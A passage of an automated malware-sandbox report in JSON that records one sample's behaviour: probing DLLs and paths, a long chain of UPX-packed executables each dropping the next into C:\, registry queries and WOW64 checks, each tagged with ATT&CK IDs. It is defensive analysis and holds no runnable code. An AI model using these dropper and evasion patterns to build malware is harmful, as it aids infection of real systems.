\"c:\\442800.exe\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"442800.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"282462.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"02006.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"248486.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"6002286.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"4484802.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"60480.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"682088.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"828684.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"44828.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"hnvfx.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"ndtrth.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" writes file \"c:\\442800.exe\"\n \"442800.exe\" writes file \"c:\\282462.exe\"\n \"282462.exe\" writes file \"c:\\02006.exe\"\n \"02006.exe\" writes file \"c:\\248486.exe\"\n \"248486.exe\" writes file \"c:\\6002286.exe\"\n \"6002286.exe\" writes file \"c:\\4484802.exe\"\n \"4484802.exe\" writes file \"c:\\60480.exe\"\n \"60480.exe\" writes file \"c:\\682088.exe\"\n \"682088.exe\" writes file \"c:\\828684.exe\"\n \"828684.exe\" writes file \"c:\\44828.exe\"\n \"44828.exe\" writes file \"c:\\hnvfx.exe\"\n \"hnvfx.exe\" writes file \"c:\\ndtrth.exe\"\n \"ndtrth.exe\" writes file \"c:\\pvvxhx.exe\"\n \"pvvxhx.exe\" writes file \"c:\\vtttbl.exe\"\n \"vtttbl.exe\" writes file \"c:\\nbhbvdb.exe\"\n \"nbhbvdb.exe\" writes file \"c:\\dljfl.exe\"\n \"dljfl.exe\" writes file \"c:\\lrxfh.exe\"\n \"lrxfh.exe\" writes file \"c:\\tnhhvv.exe\"\n \"tnhhvv.exe\" writes file \"c:\\fhrbxhx.exe\"\n \"fhrbxhx.exe\" writes file \"c:\\lnvvbl.exe\"\n \"lnvvbl.exe\" writes file \"c:\\64088.exe\"\n \"64088.exe\" writes file \"c:\\6022622.exe\"\n \"6022622.exe\" writes file \"c:\\rxvbljj.exe\"\n \"rxvbljj.exe\" writes file \"c:\\fpfntvj.exe\"\n \"fpfntvj.exe\" writes file \"c:\\hxtbvp.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"934CAC5AD03FC72A950FFD7B65AE2EAF9852B7EA1D2562D880A55244F34BD963\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"466480.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nfxflv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"00680.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xxdfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"604488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jvxvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rjrxrhl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hptvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rbffrbx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nffbnt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"88880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"60248.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jtxbhtx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lvjhvdf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvjhvdf.exe]- [targetUID: 00000000-00002200]\n \"284804.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\284804.exe]- [targetUID: 00000000-00003568]\n \"466842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\466842.exe]- [targetUID: 00000000-00003568]\n \"0246246.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0246246.exe]- [targetUID: 00000000-00004500]\n \"nndjbrh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nndjbrh.exe]- [targetUID: 00000000-00003076]\n \"frphr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\frphr.exe]- [targetUID: 00000000-00003604]\n \"rlvbpdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rlvbpdv.exe]- [targetUID: 00000000-00003604]\n \"tdxhf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tdxhf.exe]- [targetUID: 00000000-00000788]\n \"tvlvjll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tvlvjll.exe]- [targetUID: 00000000-00002824]\n \"2686426.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2686426.exe]- [targetUID: 00000000-00000812]\n \"4804844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4804844.exe]- [targetUID: 00000000-00003876]\n \"0880828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0880828.exe]- [targetUID: 00000000-00003876]\n \"xjpjtlp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xjpjtlp.exe]- [targetUID: 00000000-00000416]\n \"nnvhlr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nnvhlr.exe]- [targetUID: 00000000-00000416]\n \"vfxjdn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vfxjdn.exe]- [targetUID: 00000000-00003140]\n \"280844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\280844.exe]- [targetUID: 00000000-00003140]\n \"660206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\660206.exe]- [targetUID: 00000000-00001164]\n \"2044406.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2044406.exe]- [targetUID: 00000000-00000712]\n \"6020448.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6020448.exe]- [targetUID: 00000000-00000468]\n \"466286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\466286.exe]- [targetUID: 00000000-00000468]\n \"66026.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66026.exe]- [targetUID: 00000000-00002844]\n \"808828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\808828.exe]- [targetUID: 00000000-00002844]\n \"646228.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\646228.exe]- [targetUID: 00000000-00004436]\n \"vldbx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vldbx.exe]- [targetUID: 00000000-00003668]\n \"fxlhpd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fxlhpd.exe]- [targetUID: 00000000-00003668]\n \"828406.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\828406.exe]- [targetUID: 00000000-00004404]\n \"0002440.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0002440.exe]- [targetUID: 00000000-00004404]\n \"48022.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\48022.exe]- [targetUID: 00000000-00003988]\n \"026844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\026844.exe]- [targetUID: 00000000-00003988]\n \"20024.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\20024.exe]- [targetUID: 00000000-00004416]\n \"2268206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2268206.exe]- [targetUID: 00000000-00004416]\n \"884020.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\884020.exe]- [targetUID: 00000000-00003180]\n \"264846.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\264846.exe]- [targetUID: 00000000-00003180]\n \"282866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\282866.exe]- [targetUID: 00000000-00002380]\n \"880026.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\880026.exe]- [targetUID: 00000000-00002380]\n \"6440024.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6440024.exe]- [targetUID: 00000000-00003516]\n \"dbjvvrj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dbjvvrj.exe]- [targetUID: 00000000-00003516]\n \"xbnptrh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xbnptrh.exe]- [targetUID: 00000000-00003520]\n \"jxxfdjd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jxxfdjd.exe]- [targetUID: 00000000-00003344]\n \"hxtbvp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hxtbvp.exe]- [targetUID: 00000000-00003344]\n \"fpfntvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fpfntvj.exe]- [targetUID: 00000000-00003600]\n \"rxvbljj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rxvbljj.exe]- [targetUID: 00000000-00003600]\n \"6022622.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6022622.exe]- [targetUID: 00000000-00001072]\n \"64088.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64088.exe]- [targetUID: 00000000-00003172]\n \"lnvvbl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lnvvbl.exe]- [targetUID: 00000000-00004372]\n \"fhrbxhx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fhrbxhx.exe]- [targetUID: 00000000-00004372]\n \"tnhhvv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tnhhvv.exe]- [targetUID: 00000000-00003628]\n \"lrxfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lrxfh.exe]- [targetUID: 00000000-00004092]\n \"dljfl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dljfl.exe]- [targetUID: 00000000-00004092]\n \"nbhbvdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nbhbvdb.exe]- [targetUID: 00000000-00003944]\n \"vtttbl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vtttbl.exe]- [targetUID: 00000000-00003944]\n \"pvvxhx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pvvxhx.exe]- [targetUID: 00000000-00002812]\n \"ndtrth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ndtrth.exe]- [targetUID: 00000000-00004152]\n \"hnvfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hnvfx.exe]- [targetUID: 00000000-00004152]\n \"44828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44828.exe]- [targetUID: 00000000-00006084]\n \"828684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\828684.exe]- [targetUID: 00000000-00005900]\n \"682088.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\682088.exe]- [targetUID: 00000000-00006076]\n \"60480.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60480.exe]- [targetUID: 00000000-00006076]\n \"4484802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4484802.exe]- [targetUID: 00000000-00005876]\n \"6002286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6002286.exe]- [targetUID: 00000000-00004108]\n \"248486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\248486.exe]- [targetUID: 00000000-00004108]\n \"02006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\02006.exe]- [targetUID: 00000000-00005764]\n \"282462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\282462.exe]- [targetUID: 00000000-00006016]\n \"442800.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\442800.exe]- [targetUID: 00000000-00006052]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"IsWow64Process\" with parameter \"6052\" - (UID: 00000000-00006052)\n \"282462.exe\" called \"IsWow64Process\" with parameter \"5892\" - (UID: 00000000-00005892)\n \"02006.exe\" called \"IsWow64Process\" with parameter \"5764\" - (UID: 00000000-00005764)\n \"682088.exe\" called \"IsWow64Process\" with parameter \"5900\" - (UID: 00000000-00005900)\n \"828684.exe\" called \"IsWow64Process\" with parameter \"4100\" - (UID: 00000000-00004100)\n \"44828.exe\" called \"IsWow64Process\" with parameter \"6084\" - (UID: 00000000-00006084)\n \"hnvfx.exe\" called \"IsWow64Process\" with parameter \"4152\" - (UID: 00000000-00004152)\n \"ndtrth.exe\" called \"IsWow64Process\" with parameter \"2812\" - (UID: 00000000-00002812)\n \"vtttbl.exe\" called \"IsWow64Process\" with parameter \"3944\" - (UID: 00000000-00003944)\n \"nbhbvdb.exe\" called \"IsWow64Process\" with parameter \"2272\" - (UID: 00000000-00002272)\n \"dljfl.exe\" called \"IsWow64Process\" with parameter \"4092\" - (UID: 00000000-00004092)\n \"tnhhvv.exe\" called \"IsWow64Process\" with parameter \"3628\" - (UID: 00000000-00003628)\n \"64088.exe\" called \"IsWow64Process\" with parameter \"1072\" - (UID: 00000000-00001072)\n \"6022622.exe\" called \"IsWow64Process\" with parameter \"4004\" - (UID: 00000000-00004004)\n \"fpfntvj.exe\" called \"IsWow64Process\" with parameter \"4244\" - (UID: 00000000-00004244)\n 